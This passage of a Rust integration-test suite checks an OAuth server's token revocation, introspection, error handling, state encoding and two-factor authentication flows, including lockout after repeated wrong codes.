.send()
540
-
.await
541
-
.unwrap();
542
-
let redirect_uri = "https://example.com/revoke-callback";
543
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
544
-
let client_id = mock_client.uri();
545
-
let (code_verifier, code_challenge) = generate_pkce();
546
-
let par_body: Value = http_client
547
-
.post(format!("{}/oauth/par", url))
548
-
.form(&[
549
-
("response_type", "code"),
550
-
("client_id", &client_id),
551
-
("redirect_uri", redirect_uri),
552
-
("code_challenge", &code_challenge),
553
-
("code_challenge_method", "S256"),
554
-
])
555
-
.send()
556
-
.await
557
-
.unwrap()
558
-
.json()
559
-
.await
560
-
.unwrap();
561
-
let request_uri = par_body["request_uri"].as_str().unwrap();
562
-
let auth_client = no_redirect_client();
563
-
let auth_res = auth_client
564
-
.post(format!("{}/oauth/authorize", url))
565
-
.form(&[
566
-
("request_uri", request_uri),
567
-
("username", &handle),
568
-
("password", password),
569
-
("remember_device", "false"),
570
-
])
571
-
.send()
572
-
.await
573
-
.unwrap();
574
-
let location = auth_res
575
-
.headers()
576
-
.get("location")
577
-
.unwrap()
578
-
.to_str()
579
-
.unwrap();
580
-
let code = location
581
-
.split("code=")
582
-
.nth(1)
583
-
.unwrap()
584
-
.split('&')
585
-
.next()
586
-
.unwrap();
587
-
let token_body: Value = http_client
588
.post(format!("{}/oauth/token", url))
589
-
.form(&[
590
-
("grant_type", "authorization_code"),
591
-
("code", code),
592
-
("redirect_uri", redirect_uri),
593
-
("code_verifier", &code_verifier),
594
-
("client_id", &client_id),
595
-
])
596
-
.send()
597
-
.await
598
-
.unwrap()
599
-
.json()
600
-
.await
601
-
.unwrap();
602
-
let refresh_token = token_body["refresh_token"].as_str().unwrap();
603
-
let revoke_res = http_client
604
-
.post(format!("{}/oauth/revoke", url))
605
-
.form(&[("token", refresh_token)])
606
-
.send()
607
-
.await
608
-
.unwrap();
609
-
assert_eq!(revoke_res.status(), StatusCode::OK);
610
-
let refresh_after_revoke = http_client
611
-
.post(format!("{}/oauth/token", url))
612
-
.form(&[
613
-
("grant_type", "refresh_token"),
614
-
("refresh_token", refresh_token),
615
-
("client_id", &client_id),
616
-
])
617
-
.send()
618
-
.await
619
-
.unwrap();
620
-
assert_eq!(refresh_after_revoke.status(), StatusCode::BAD_REQUEST);
621
-
}
622
-
#[tokio::test]
623
-
async fn test_unsupported_grant_type() {
624
-
let url = base_url().await;
625
-
let http_client = client();
626
-
let res = http_client
627
-
.post(format!("{}/oauth/token", url))
628
-
.form(&[
629
-
("grant_type", "client_credentials"),
630
-
("client_id", "https://example.com"),
631
-
])
632
-
.send()
633
-
.await
634
-
.unwrap();
635
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
636
-
let body: Value = res.json().await.unwrap();
637
assert_eq!(body["error"], "unsupported_grant_type");
638
-
}
639
-
#[tokio::test]
640
-
async fn test_invalid_refresh_token() {
641
-
let url = base_url().await;
642
-
let http_client = client();
643
-
let res = http_client
644
.post(format!("{}/oauth/token", url))
645
-
.form(&[
646
-
("grant_type", "refresh_token"),
647
-
("refresh_token", "invalid-refresh-token"),
648
-
("client_id", "https://example.com"),
649
-
])
650
-
.send()
651
-
.await
652
-
.unwrap();
653
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
654
-
let body: Value = res.json().await.unwrap();
655
assert_eq!(body["error"], "invalid_grant");
656
-
}
657
-
#[tokio::test]
658
-
async fn test_expired_authorization_request() {
659
-
let url = base_url().await;
660
-
let http_client = client();
661
-
let res = http_client
662
-
.get(format!("{}/oauth/authorize", url))
663
-
.header("Accept", "application/json")
664
-
.query(&[(
665
-
"request_uri",
666
-
"urn:ietf:params:oauth:request_uri:expired-or-nonexistent",
667
-
)])
668
-
.send()
669
-
.await
670
-
.unwrap();
671
-
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
672
-
let body: Value = res.json().await.unwrap();
673
-
assert_eq!(body["error"], "invalid_request");
674
-
}
675
-
#[tokio::test]
676
-
async fn test_token_introspection() {
677
-
let url = base_url().await;
678
-
let http_client = client();
679
-
let ts = Utc::now().timestamp_millis();
680
-
let handle = format!("introspect-{}", ts);
681
-
let email = format!("introspect-{}@example.com", ts);
682
-
let password = "introspect-password";
683
-
http_client
684
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
685
-
.json(&json!({
686
-
"handle": handle,
687
-
"email": email,
688
-
"password": password
689
-
}))
690
-
.send()
691
-
.await
692
-
.unwrap();
693
-
let redirect_uri = "https://example.com/introspect-callback";
694
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
695
-
let client_id = mock_client.uri();
696
-
let (code_verifier, code_challenge) = generate_pkce();
697
-
let par_body: Value = http_client
698
-
.post(format!("{}/oauth/par", url))
699
-
.form(&[
700
-
("response_type", "code"),
701
-
("client_id", &client_id),
702
-
("redirect_uri", redirect_uri),
703
-
("code_challenge", &code_challenge),
704
-
("code_challenge_method", "S256"),
705
-
])
706
-
.send()
707
-
.await
708
-
.unwrap()
709
-
.json()
710
-
.await
711
-
.unwrap();
712
-
let request_uri = par_body["request_uri"].as_str().unwrap();
713
-
let auth_client = no_redirect_client();
714
-
let auth_res = auth_client
715
-
.post(format!("{}/oauth/authorize", url))
716
-
.form(&[
717
-
("request_uri", request_uri),
718
-
("username", &handle),
719
-
("password", password),
720
-
("remember_device", "false"),
721
-
])
722
-
.send()
723
-
.await
724
-
.unwrap();
725
-
let location = auth_res
726
-
.headers()
727
-
.get("location")
728
-
.unwrap()
729
-
.to_str()
730
-
.unwrap();
731
-
let code = location
732
-
.split("code=")
733
-
.nth(1)
734
-
.unwrap()
735
-
.split('&')
736
-
.next()
737
-
.unwrap();
738
-
let token_body: Value = http_client
739
-
.post(format!("{}/oauth/token", url))
740
-
.form(&[
741
-
("grant_type", "authorization_code"),
742
-
("code", code),
743
-
("redirect_uri", redirect_uri),
744
-
("code_verifier", &code_verifier),
745
-
("client_id", &client_id),
746
-
])
747
-
.send()
748
-
.await
749
-
.unwrap()
750
-
.json()
751
-
.await
752
-
.unwrap();
753
-
let access_token = token_body["access_token"].as_str().unwrap();
754
-
let introspect_res = http_client
755
-
.post(format!("{}/oauth/introspect", url))
756
-
.form(&[("token", access_token)])
757
-
.send()
758
-
.await
759
-
.unwrap();
760
-
assert_eq!(introspect_res.status(), StatusCode::OK);
761
-
let introspect_body: Value = introspect_res.json().await.unwrap();
762
-
assert_eq!(introspect_body["active"], true);
763
-
assert!(introspect_body["client_id"].is_string());
764
-
assert!(introspect_body["exp"].is_number());
765
-
}
766
-
#[tokio::test]
767
-
async fn test_introspect_invalid_token() {
768
-
let url = base_url().await;
769
-
let http_client = client();
770
-
let res = http_client
771
.post(format!("{}/oauth/introspect", url))
772
.form(&[("token", "invalid.token.here")])
773
-
.send()
774
-
.await
775
-
.unwrap();
776
-
assert_eq!(res.status(), StatusCode::OK);
777
-
let body: Value = res.json().await.unwrap();
778
assert_eq!(body["active"], false);
779
-
}
780
-
#[tokio::test]
781
-
async fn test_introspect_revoked_token() {
782
-
let url = base_url().await;
783
-
let http_client = client();
784
-
let ts = Utc::now().timestamp_millis();
785
-
let handle = format!("introspect-revoked-{}", ts);
786
-
let email = format!("introspect-revoked-{}@example.com", ts);
787
-
let password = "introspect-revoked-password";
788
-
http_client
789
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
790
-
.json(&json!({
791
-
"handle": handle,
792
-
"email": email,
793
-
"password": password
794
-
}))
795
-
.send()
796
-
.await
797
-
.unwrap();
798
-
let redirect_uri = "https://example.com/introspect-revoked-callback";
799
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
800
-
let client_id = mock_client.uri();
801
-
let (code_verifier, code_challenge) = generate_pkce();
802
-
let par_body: Value = http_client
803
-
.post(format!("{}/oauth/par", url))
804
-
.form(&[
805
-
("response_type", "code"),
806
-
("client_id", &client_id),
807
-
("redirect_uri", redirect_uri),
808
-
("code_challenge", &code_challenge),
809
-
("code_challenge_method", "S256"),
810
-
])
811
-
.send()
812
-
.await
813
-
.unwrap()
814
-
.json()
815
-
.await
816
-
.unwrap();
817
-
let request_uri = par_body["request_uri"].as_str().unwrap();
818
-
let auth_client = no_redirect_client();
819
-
let auth_res = auth_client
820
-
.post(format!("{}/oauth/authorize", url))
821
-
.form(&[
822
-
("request_uri", request_uri),
823
-
("username", &handle),
824
-
("password", password),
825
-
("remember_device", "false"),
826
-
])
827
-
.send()
828
-
.await
829
-
.unwrap();
830
-
let location = auth_res
831
-
.headers()
832
-
.get("location")
833
-
.unwrap()
834
-
.to_str()
835
-
.unwrap();
836
-
let code = location
837
-
.split("code=")
838
-
.nth(1)
839
-
.unwrap()
840
-
.split('&')
841
-
.next()
842
-
.unwrap();
843
-
let token_body: Value = http_client
844
-
.post(format!("{}/oauth/token", url))
845
-
.form(&[
846
-
("grant_type", "authorization_code"),
847
-
("code", code),
848
-
("redirect_uri", redirect_uri),
849
-
("code_verifier", &code_verifier),
850
-
("client_id", &client_id),
851
-
])
852
-
.send()
853
-
.await
854
-
.unwrap()
855
-
.json()
856
-
.await
857
-
.unwrap();
858
-
let access_token = token_body["access_token"].as_str().unwrap();
859
-
let refresh_token = token_body["refresh_token"].as_str().unwrap();
860
-
http_client
861
-
.post(format!("{}/oauth/revoke", url))
862
-
.form(&[("token", refresh_token)])
863
-
.send()
864
-
.await
865
-
.unwrap();
866
-
let introspect_res = http_client
867
-
.post(format!("{}/oauth/introspect", url))
868
-
.form(&[("token", access_token)])
869
-
.send()
870
-
.await
871
-
.unwrap();
872
-
assert_eq!(introspect_res.status(), StatusCode::OK);
873
-
let body: Value = introspect_res.json().await.unwrap();
874
-
assert_eq!(body["active"], false, "Revoked token should be inactive");
875
}
876
-
#[tokio::test]
877
-
async fn test_state_with_special_chars() {
878
-
let url = base_url().await;
879
-
let http_client = client();
880
-
let ts = Utc::now().timestamp_millis();
881
-
let handle = format!("state-special-{}", ts);
882
-
let email = format!("state-special-{}@example.com", ts);
883
-
let password = "state-special-password";
884
-
http_client
885
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
886
-
.json(&json!({
887
-
"handle": handle,
888
-
"email": email,
889
-
"password": password
890
-
}))
891
-
.send()
892
-
.await
893
-
.unwrap();
894
-
let redirect_uri = "https://example.com/state-special-callback";
895
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
896
-
let client_id = mock_client.uri();
897
-
let (_code_verifier, code_challenge) = generate_pkce();
898
-
let special_state = "state=with&special=chars&plus+more";
899
-
let par_body: Value = http_client
900
-
.post(format!("{}/oauth/par", url))
901
-
.form(&[
902
-
("response_type", "code"),
903
-
("client_id", &client_id),
904
-
("redirect_uri", redirect_uri),
905
-
("code_challenge", &code_challenge),
906
-
("code_challenge_method", "S256"),
907
-
("state", special_state),
908
-
])
909
-
.send()
910
-
.await
911
-
.unwrap()
912
-
.json()
913
-
.await
914
-
.unwrap();
915
-
let request_uri = par_body["request_uri"].as_str().unwrap();
916
-
let auth_client = no_redirect_client();
917
-
let auth_res = auth_client
918
-
.post(format!("{}/oauth/authorize", url))
919
-
.form(&[
920
-
("request_uri", request_uri),
921
-
("username", &handle),
922
-
("password", password),
923
-
("remember_device", "false"),
924
-
])
925
-
.send()
926
-
.await
927
-
.unwrap();
928
-
assert!(
929
-
auth_res.status().is_redirection(),
930
-
"Should redirect even with special chars in state"
931
-
);
932
-
let location = auth_res
933
-
.headers()
934
-
.get("location")
935
-
.unwrap()
936
-
.to_str()
937
-
.unwrap();
938
-
assert!(
939
-
location.contains("state="),
940
-
"State should be in redirect URL"
941
-
);
942
-
let encoded_state = urlencoding::encode(special_state);
943
-
assert!(
944
-
location.contains(&format!("state={}", encoded_state)),
945
-
"State should be URL-encoded. Got: {}",
946
-
location
947
-
);
948
-
}
949
#[tokio::test]
950
-
async fn test_2fa_required_when_enabled() {
951
let url = base_url().await;
952
let http_client = client();
953
let ts = Utc::now().timestamp_millis();
954
-
let handle = format!("2fa-required-{}", ts);
955
-
let email = format!("2fa-required-{}@example.com", ts);
956
let password = "2fa-test-password";
957
let create_res = http_client
958
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
959
-
.json(&json!({
960
-
"handle": handle,
961
-
"email": email,
962
-
"password": password
963
-
}))
964
-
.send()
965
-
.await
966
-
.unwrap();
967
assert_eq!(create_res.status(), StatusCode::OK);
968
let account: Value = create_res.json().await.unwrap();
969
let user_did = account["did"].as_str().unwrap();
970
-
let db_url = common::get_db_connection_string().await;
971
-
let pool = sqlx::postgres::PgPoolOptions::new()
972
-
.max_connections(1)
973
-
.connect(&db_url)
974
-
.await
975
-
.expect("Failed to connect to database");
976
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
977
-
.bind(user_did)
978
-
.execute(&pool)
979
-
.await
980
-
.expect("Failed to enable 2FA");
981
let redirect_uri = "https://example.com/2fa-callback";
982
let mock_client = setup_mock_client_metadata(redirect_uri).await;
983
let client_id = mock_client.uri();
984
-
let (_, code_challenge) = generate_pkce();
985
let par_body: Value = http_client
986
.post(format!("{}/oauth/par", url))
987
-
.form(&[
988
-
("response_type", "code"),
989
-
("client_id", &client_id),
990
-
("redirect_uri", redirect_uri),
991
-
("code_challenge", &code_challenge),
992
-
("code_challenge_method", "S256"),
993
-
])
994
-
.send()
995
-
.await
996
-
.unwrap()
997
-
.json()
998
-
.await
999
-
.unwrap();
1000
let request_uri = par_body["request_uri"].as_str().unwrap();
1001
let auth_client = no_redirect_client();
1002
let auth_res = auth_client
1003
.post(format!("{}/oauth/authorize", url))
1004
-
.form(&[
1005
-
("request_uri", request_uri),
1006
-
("username", &handle),
1007
-
("password", password),
1008
-
("remember_device", "false"),
1009
-
])
1010
-
.send()
1011
-
.await
1012
-
.unwrap();
1013
-
assert!(
1014
-
auth_res.status().is_redirection(),
1015
-
"Should redirect to 2FA page, got status: {}",
1016
-
auth_res.status()
1017
-
);
1018
-
let location = auth_res
1019
-
.headers()
1020
-
.get("location")
1021
-
.unwrap()
1022
-
.to_str()
1023
-
.unwrap();
1024
-
assert!(
1025
-
location.contains("/oauth/authorize/2fa"),
1026
-
"Should redirect to 2FA page, got: {}",
1027
-
location
1028
-
);
1029
-
assert!(
1030
-
location.contains("request_uri="),
1031
-
"2FA redirect should include request_uri"
1032
-
);
1033
-
}
1034
-
#[tokio::test]
1035
-
async fn test_2fa_invalid_code_rejected() {
1036
-
let url = base_url().await;
1037
-
let http_client = client();
1038
-
let ts = Utc::now().timestamp_millis();
1039
-
let handle = format!("2fa-invalid-{}", ts);
1040
-
let email = format!("2fa-invalid-{}@example.com", ts);
1041
-
let password = "2fa-test-password";
1042
-
let create_res = http_client
1043
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1044
-
.json(&json!({
1045
-
"handle": handle,
1046
-
"email": email,
1047
-
"password": password
1048
-
}))
1049
-
.send()
1050
-
.await
1051
-
.unwrap();
1052
-
assert_eq!(create_res.status(), StatusCode::OK);
1053
-
let account: Value = create_res.json().await.unwrap();
1054
-
let user_did = account["did"].as_str().unwrap();
1055
-
let db_url = common::get_db_connection_string().await;
1056
-
let pool = sqlx::postgres::PgPoolOptions::new()
1057
-
.max_connections(1)
1058
-
.connect(&db_url)
1059
-
.await
1060
-
.expect("Failed to connect to database");
1061
-
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1062
-
.bind(user_did)
1063
-
.execute(&pool)
1064
-
.await
1065
-
.expect("Failed to enable 2FA");
1066
-
let redirect_uri = "https://example.com/2fa-invalid-callback";
1067
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1068
-
let client_id = mock_client.uri();
1069
-
let (_, code_challenge) = generate_pkce();
1070
-
let par_body: Value = http_client
1071
-
.post(format!("{}/oauth/par", url))
1072
-
.form(&[
1073
-
("response_type", "code"),
1074
-
("client_id", &client_id),
1075
-
("redirect_uri", redirect_uri),
1076
-
("code_challenge", &code_challenge),
1077
-
("code_challenge_method", "S256"),
1078
-
])
1079
-
.send()
1080
-
.await
1081
-
.unwrap()
1082
-
.json()
1083
-
.await
1084
-
.unwrap();
1085
-
let request_uri = par_body["request_uri"].as_str().unwrap();
1086
-
let auth_client = no_redirect_client();
1087
-
let auth_res = auth_client
1088
-
.post(format!("{}/oauth/authorize", url))
1089
-
.form(&[
1090
-
("request_uri", request_uri),
1091
-
("username", &handle),
1092
-
("password", password),
1093
-
("remember_device", "false"),
1094
-
])
1095
-
.send()
1096
-
.await
1097
-
.unwrap();
1098
-
assert!(auth_res.status().is_redirection());
1099
-
let location = auth_res
1100
-
.headers()
1101
-
.get("location")
1102
-
.unwrap()
1103
-
.to_str()
1104
-
.unwrap();
1105
-
assert!(location.contains("/oauth/authorize/2fa"));
1106
-
let twofa_res = http_client
1107
.post(format!("{}/oauth/authorize/2fa", url))
1108
.form(&[("request_uri", request_uri), ("code", "000000")])
1109
-
.send()
1110
-
.await
1111
-
.unwrap();
1112
-
assert_eq!(twofa_res.status(), StatusCode::OK);
1113
-
let body = twofa_res.text().await.unwrap();
1114
-
assert!(
1115
-
body.contains("Invalid verification code") || body.contains("invalid"),
1116
-
"Should show error for invalid code"
1117
-
);
1118
-
}
1119
-
#[tokio::test]
1120
-
async fn test_2fa_valid_code_completes_auth() {
1121
-
let url = base_url().await;
1122
-
let http_client = client();
1123
-
let ts = Utc::now().timestamp_millis();
1124
-
let handle = format!("2fa-valid-{}", ts);
1125
-
let email = format!("2fa-valid-{}@example.com", ts);
1126
-
let password = "2fa-test-password";
1127
-
let create_res = http_client
1128
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1129
-
.json(&json!({
1130
-
"handle": handle,
1131
-
"email": email,
1132
-
"password": password
1133
-
}))
1134
-
.send()
1135
-
.await
1136
-
.unwrap();
1137
-
assert_eq!(create_res.status(), StatusCode::OK);
1138
-
let account: Value = create_res.json().await.unwrap();
1139
-
let user_did = account["did"].as_str().unwrap();
1140
-
let db_url = common::get_db_connection_string().await;
1141
-
let pool = sqlx::postgres::PgPoolOptions::new()
1142
-
.max_connections(1)
1143
-
.connect(&db_url)
1144
-
.await
1145
-
.expect("Failed to connect to database");
1146
-
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1147
-
.bind(user_did)
1148
-
.execute(&pool)
1149
-
.await
1150
-
.expect("Failed to enable 2FA");
1151
-
let redirect_uri = "https://example.com/2fa-valid-callback";
1152
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1153
-
let client_id = mock_client.uri();
1154
-
let (code_verifier, code_challenge) = generate_pkce();
1155
-
let par_body: Value = http_client
1156
-
.post(format!("{}/oauth/par", url))
1157
-
.form(&[
1158
-
("response_type", "code"),
1159
-
("client_id", &client_id),
1160
-
("redirect_uri", redirect_uri),
1161
-
("code_challenge", &code_challenge),
1162
-
("code_challenge_method", "S256"),
1163
-
])
1164
-
.send()
1165
-
.await
1166
-
.unwrap()
1167
-
.json()
1168
-
.await
1169
-
.unwrap();
1170
-
let request_uri = par_body["request_uri"].as_str().unwrap();
1171
-
let auth_client = no_redirect_client();
1172
-
let auth_res = auth_client
1173
-
.post(format!("{}/oauth/authorize", url))
1174
-
.form(&[
1175
-
("request_uri", request_uri),
1176
-
("username", &handle),
1177
-
("password", password),
1178
-
("remember_device", "false"),
1179
-
])
1180
-
.send()
1181
-
.await
1182
-
.unwrap();
1183
-
assert!(auth_res.status().is_redirection());
1184
-
let twofa_code: String =
1185
-
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
1186
-
.bind(request_uri)
1187
-
.fetch_one(&pool)
1188
-
.await
1189
-
.expect("Failed to get 2FA code from database");
1190
let twofa_res = auth_client
1191
.post(format!("{}/oauth/authorize/2fa", url))
1192
.form(&[("request_uri", request_uri), ("code", &twofa_code)])
1193
-
.send()
1194
-
.await
1195
-
.unwrap();
1196
-
assert!(
1197
-
twofa_res.status().is_redirection(),
1198
-
"Valid 2FA code should redirect to success, got status: {}",
1199
-
twofa_res.status()
1200
-
);
1201
-
let location = twofa_res
1202
-
.headers()
1203
-
.get("location")
1204
-
.unwrap()
1205
-
.to_str()
1206
-
.unwrap();
1207
-
assert!(
1208
-
location.starts_with(redirect_uri),
1209
-
"Should redirect to client callback, got: {}",
1210
-
location
1211
-
);
1212
-
assert!(
1213
-
location.contains("code="),
1214
-
"Redirect should include authorization code"
1215
-
);
1216
-
let auth_code = location
1217
-
.split("code=")
1218
-
.nth(1)
1219
-
.unwrap()
1220
-
.split('&')
1221
-
.next()
1222
-
.unwrap();
1223
let token_res = http_client
1224
.post(format!("{}/oauth/token", url))
1225
-
.form(&[
1226
-
("grant_type", "authorization_code"),
1227
-
("code", auth_code),
1228
-
("redirect_uri", redirect_uri),
1229
-
("code_verifier", &code_verifier),
1230
-
("client_id", &client_id),
1231
-
])
1232
-
.send()
1233
-
.await
1234
-
.unwrap();
1235
-
assert_eq!(
1236
-
token_res.status(),
1237
-
StatusCode::OK,
1238
-
"Token exchange should succeed"
1239
-
);
1240
let token_body: Value = token_res.json().await.unwrap();
1241
-
assert!(token_body["access_token"].is_string());
1242
assert_eq!(token_body["sub"], user_did);
1243
}
1244
#[tokio::test]
1245
-
async fn test_2fa_lockout_after_max_attempts() {
1246
let url = base_url().await;
1247
let http_client = client();
1248
let ts = Utc::now().timestamp_millis();
···
1251
let password = "2fa-test-password";
1252
let create_res = http_client
1253
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1254
-
.json(&json!({
1255
-
"handle": handle,
1256
-
"email": email,
1257
-
"password": password
1258
-
}))
1259
-
.send()
1260
-
.await
1261
-
.unwrap();
1262
-
assert_eq!(create_res.status(), StatusCode::OK);
1263
let account: Value = create_res.json().await.unwrap();
1264
let user_did = account["did"].as_str().unwrap();
1265
-
let db_url = common::get_db_connection_string().await;
1266
-
let pool = sqlx::postgres::PgPoolOptions::new()
1267
-
.max_connections(1)
1268
-
.connect(&db_url)
1269
-
.await
1270
-
.expect("Failed to connect to database");
1271
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1272
-
.bind(user_did)
1273
-
.execute(&pool)
1274
-
.await
1275
-
.expect("Failed to enable 2FA");
1276
let redirect_uri = "https://example.com/2fa-lockout-callback";
1277
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1278
let client_id = mock_client.uri();
1279
let (_, code_challenge) = generate_pkce();
1280
let par_body: Value = http_client
1281
.post(format!("{}/oauth/par", url))
1282
-
.form(&[
1283
-
("response_type", "code"),
1284
-
("client_id", &client_id),
1285
-
("redirect_uri", redirect_uri),
1286
-
("code_challenge", &code_challenge),
1287
-
("code_challenge_method", "S256"),
1288
-
])
1289
-
.send()
1290
-
.await
1291
-
.unwrap()
1292
-
.json()
1293
-
.await
1294
-
.unwrap();
1295
let request_uri = par_body["request_uri"].as_str().unwrap();
1296
let auth_client = no_redirect_client();
1297
let auth_res = auth_client
1298
.post(format!("{}/oauth/authorize", url))
1299
-
.form(&[
1300
-
("request_uri", request_uri),
1301
-
("username", &handle),
1302
-
("password", password),
1303
-
("remember_device", "false"),
1304
-
])
1305
-
.send()
1306
-
.await
1307
-
.unwrap();
1308
assert!(auth_res.status().is_redirection());
1309
for i in 0..5 {
1310
let res = http_client
1311
.post(format!("{}/oauth/authorize/2fa", url))
1312
.form(&[("request_uri", request_uri), ("code", "999999")])
1313
-
.send()
1314
-
.await
1315
-
.unwrap();
1316
if i < 4 {
1317
-
assert_eq!(
1318
-
res.status(),
1319
-
StatusCode::OK,
1320
-
"Attempt {} should show error page",
1321
-
i + 1
1322
-
);
1323
-
let body = res.text().await.unwrap();
1324
-
assert!(
1325
-
body.contains("Invalid verification code"),
1326
-
"Should show invalid code error on attempt {}",
1327
-
i + 1
1328
-
);
1329
}
1330
}
1331
let lockout_res = http_client
1332
.post(format!("{}/oauth/authorize/2fa", url))
1333
.form(&[("request_uri", request_uri), ("code", "999999")])
1334
-
.send()
1335
-
.await
1336
-
.unwrap();
1337
-
assert_eq!(lockout_res.status(), StatusCode::OK);
1338
let body = lockout_res.text().await.unwrap();
1339
-
assert!(
1340
-
body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
1341
-
"Should be locked out after max attempts. Body: {}",
1342
-
&body[..body.len().min(500)]
1343
-
);
1344
}
1345
#[tokio::test]
1346
-
async fn test_account_selector_with_2fa_requires_verification() {
1347
let url = base_url().await;
1348
let http_client = client();
1349
let ts = Utc::now().timestamp_millis();
···
1352
let password = "selector-2fa-password";
1353
let create_res = http_client
1354
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1355
-
.json(&json!({
1356
-
"handle": handle,
1357
-
"email": email,
1358
-
"password": password
1359
-
}))
1360
-
.send()
1361
-
.await
1362
-
.unwrap();
1363
-
assert_eq!(create_res.status(), StatusCode::OK);
1364
let account: Value = create_res.json().await.unwrap();
1365
let user_did = account["did"].as_str().unwrap().to_string();
1366
let redirect_uri = "https://example.com/selector-2fa-callback";
···
1369
let (code_verifier, code_challenge) = generate_pkce();
1370
let par_body: Value = http_client
1371
.post(format!("{}/oauth/par", url))
1372
-
.form(&[
1373
-
("response_type", "code"),
1374
-
("client_id", &client_id),
1375
-
("redirect_uri", redirect_uri),
1376
-
("code_challenge", &code_challenge),
1377
-
("code_challenge_method", "S256"),
1378
-
])
1379
-
.send()
1380
-
.await
1381
-
.unwrap()
1382
-
.json()
1383
-
.await
1384
-
.unwrap();
1385
let request_uri = par_body["request_uri"].as_str().unwrap();
1386
let auth_client = no_redirect_client();
1387
let auth_res = auth_client
1388
.post(format!("{}/oauth/authorize", url))
1389
-
.form(&[
1390
-
("request_uri", request_uri),
1391
-
("username", &handle),
1392
-
("password", password),
1393
-
("remember_device", "true"),
1394
-
])
1395
-
.send()
1396
-
.await
1397
-
.unwrap();
1398
assert!(auth_res.status().is_redirection());
1399
-
let device_cookie = auth_res
1400
-
.headers()
1401
-
.get("set-cookie")
1402
.and_then(|v| v.to_str().ok())
1403
.map(|s| s.split(';').next().unwrap_or("").to_string())
1404
-
.expect("Should have received device cookie");
1405
-
let location = auth_res
1406
-
.headers()
1407
-
.get("location")
1408
-
.unwrap()
1409
-
.to_str()
1410
-
.unwrap();
1411
-
assert!(location.contains("code="), "First auth should succeed");
1412
-
let code = location
1413
-
.split("code=")
1414
-
.nth(1)
1415
-
.unwrap()
1416
-
.split('&')
1417
-
.next()
1418
-
.unwrap();
1419
-
let _token_body: Value = http_client
1420
.post(format!("{}/oauth/token", url))
1421
-
.form(&[
1422
-
("grant_type", "authorization_code"),
1423
-
("code", code),
1424
-
("redirect_uri", redirect_uri),
1425
-
("code_verifier", &code_verifier),
1426
-
("client_id", &client_id),
1427
-
])
1428
-
.send()
1429
-
.await
1430
-
.unwrap()
1431
-
.json()
1432
-
.await
1433
-
.unwrap();
1434
-
let db_url = common::get_db_connection_string().await;
1435
-
let pool = sqlx::postgres::PgPoolOptions::new()
1436
-
.max_connections(1)
1437
-
.connect(&db_url)
1438
-
.await
1439
-
.expect("Failed to connect to database");
1440
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1441
-
.bind(&user_did)
1442
-
.execute(&pool)
1443
-
.await
1444
-
.expect("Failed to enable 2FA");
1445
let (code_verifier2, code_challenge2) = generate_pkce();
1446
let par_body2: Value = http_client
1447
.post(format!("{}/oauth/par", url))
1448
-
.form(&[
1449
-
("response_type", "code"),
1450
-
("client_id", &client_id),
1451
-
("redirect_uri", redirect_uri),
1452
-
("code_challenge", &code_challenge2),
1453
-
("code_challenge_method", "S256"),
1454
-
])
1455
-
.send()
1456
-
.await
1457
-
.unwrap()
1458
-
.json()
1459
-
.await
1460
-
.unwrap();
1461
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
1462
let select_res = auth_client
1463
.post(format!("{}/oauth/authorize/select", url))
1464
.header("cookie", &device_cookie)
1465
.form(&[("request_uri", request_uri2), ("did", &user_did)])
1466
-
.send()
1467
-
.await
1468
-
.unwrap();
1469
-
assert!(
1470
-
select_res.status().is_redirection(),
1471
-
"Account selector should redirect, got status: {}",
1472
-
select_res.status()
1473
-
);
1474
-
let select_location = select_res
1475
-
.headers()
1476
-
.get("location")
1477
-
.unwrap()
1478
-
.to_str()
1479
-
.unwrap();
1480
-
assert!(
1481
-
select_location.contains("/oauth/authorize/2fa"),
1482
-
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
1483
-
select_location
1484
-
);
1485
-
let twofa_code: String =
1486
-
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
1487
-
.bind(request_uri2)
1488
-
.fetch_one(&pool)
1489
-
.await
1490
-
.expect("Failed to get 2FA code");
1491
let twofa_res = auth_client
1492
.post(format!("{}/oauth/authorize/2fa", url))
1493
.header("cookie", &device_cookie)
1494
.form(&[("request_uri", request_uri2), ("code", &twofa_code)])
1495
-
.send()
1496
-
.await
1497
-
.unwrap();
1498
assert!(twofa_res.status().is_redirection());
1499
-
let final_location = twofa_res
1500
-
.headers()
1501
-
.get("location")
1502
-
.unwrap()
1503
-
.to_str()
1504
-
.unwrap();
1505
-
assert!(
1506
-
final_location.starts_with(redirect_uri) && final_location.contains("code="),
1507
-
"After 2FA, should redirect to client with code, got: {}",
1508
-
final_location
1509
-
);
1510
-
let final_code = final_location
1511
-
.split("code=")
1512
-
.nth(1)
1513
-
.unwrap()
1514
-
.split('&')
1515
-
.next()
1516
-
.unwrap();
1517
let token_res = http_client
1518
.post(format!("{}/oauth/token", url))
1519
-
.form(&[
1520
-
("grant_type", "authorization_code"),
1521
-
("code", final_code),
1522
-
("redirect_uri", redirect_uri),
1523
-
("code_verifier", &code_verifier2),
1524
-
("client_id", &client_id),
1525
-
])
1526
-
.send()
1527
-
.await
1528
-
